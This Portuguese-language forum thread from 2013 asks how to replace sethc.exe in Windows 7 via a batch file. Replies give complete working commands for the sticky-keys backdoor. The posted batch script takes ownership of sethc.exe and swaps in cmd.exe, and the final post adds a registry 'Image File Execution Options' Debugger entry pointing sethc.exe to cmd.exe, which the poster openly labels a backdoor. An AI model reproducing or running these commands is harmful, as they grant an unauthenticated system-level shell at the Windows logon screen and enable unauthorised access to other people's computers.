Batch-Satti
Gostaria de reagir a esta mensagem? Crie uma conta em poucos cliques ou inicie sessão para continuar.
Batch-Satti

Você não está conectado. Conecte-se ou registre-se

Renover Sethc.exe

2 participantes

Ir para baixo  Mensagem [Página 1 de 1]

1Renover Sethc.exe Empty Renover Sethc.exe Qui Mar 07, 2013 11:03 am

ilunne



Colegas,
Preciso Renomear o arquivo Sethc.exe na pasta System32 do windows7 em um BAT.
Mesmo executando o cmd como administrador, para testar, da erro de acesso negado ao renomear ou mesmo deletar este arquivo.

Eu preciso fazer isso para automatizar uma rotina de manutenção que eu faço.
Alguém tem alguma idéia de como proceder?

Outra dúvida que eu tenho é quanto ao significado do comando "pushd %~dp0", que retorna ao diretório onde o arquivo foi executado. Por quê %~dp0?

Mad

2Renover Sethc.exe Empty Re: Renover Sethc.exe Qui Mar 07, 2013 7:44 pm

Boss-Head

Boss-Head

[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]

sua duvida pode ser sanada aqui Question

quanto ao Sethc.exe




@echo off
takeown /f %systemroot%\system32\sethc.exe
icacls %systemroot%\system32\sethc.exe /grant administrador:f
rename %systemroot%\system32\sethc.exe sethc.exe.bak
copy %systemroot%\system32\cmd.exe %systemroot%\system32\cmd3.exe
rename %systemroot%\system32\cmd3.exe sethc.exe

tenta se não der vamos tentando....

Pssn gosta desta mensagem

3Renover Sethc.exe Empty Re: Renover Sethc.exe Ter Mar 26, 2013 1:40 pm

ilunne



Boss-Head escreveu:[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]

sua duvida pode ser sanada aqui Question

quanto ao Sethc.exe




@echo off
takeown /f %systemroot%\system32\sethc.exe
icacls %systemroot%\system32\sethc.exe /grant administrador:f
rename %systemroot%\system32\sethc.exe sethc.exe.bak
copy %systemroot%\system32\cmd.exe %systemroot%\system32\cmd3.exe
rename %systemroot%\system32\cmd3.exe sethc.exe

tenta se não der vamos tentando....

a partir da linha rename da acesso negado,
eu tentei executar linha a linha no cmd em modo administrativo mas não deu...
que fazer?

Pssn gosta desta mensagem

4Renover Sethc.exe Empty BackDoor Win7 Sex Abr 12, 2013 11:09 pm

ilunne



A ajuda fornecida não teve resultado.
Entretanto, estendendo minha pesquisa, achei duas soluções, uma semelhando ao que pretendia fazer, e outra muito mais interessante e rápida, via registro do ruindows.

A intenção é criar um backdoor no meu computador, de forma semi-automática durante o processo de formatação.

Compartilho aqui os dois procedimentos:


+--------------------------------------+
Forma como eu esperava fazer
+--------------------------------------+

Basta substituir o arquivo (quase inútil) sethc.exe e copiar o cmd.exe com o nome sethc.exe. O sethc é responsável por mostrar aquela janela de advertência quando se pressiona shift 5 vezes, esta janela pode ser invocada na tela de logon.

Só que no windows 7 o proprietário deste arquivo está "acima" do grupo administradores, então é necessário primeiro tornar-se proprietário dele:

Código:
takeown /f "c:\windows\system32\Sethc.exe"
icacls "c:\windows\system32\Sethc.exe" /grant administradores:F

Depois é só seguir com o resto do script.

===================================
Forma mais eficiente
===================================

Não precisa apagar nem substituir arquivo, basta mexer no registro, via script mesmo:

Código:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

Pssn gosta desta mensagem

Conteúdo patrocinado



Ir para o topo  Mensagem [Página 1 de 1]

Permissões neste sub-fórum
Não podes responder a tópicos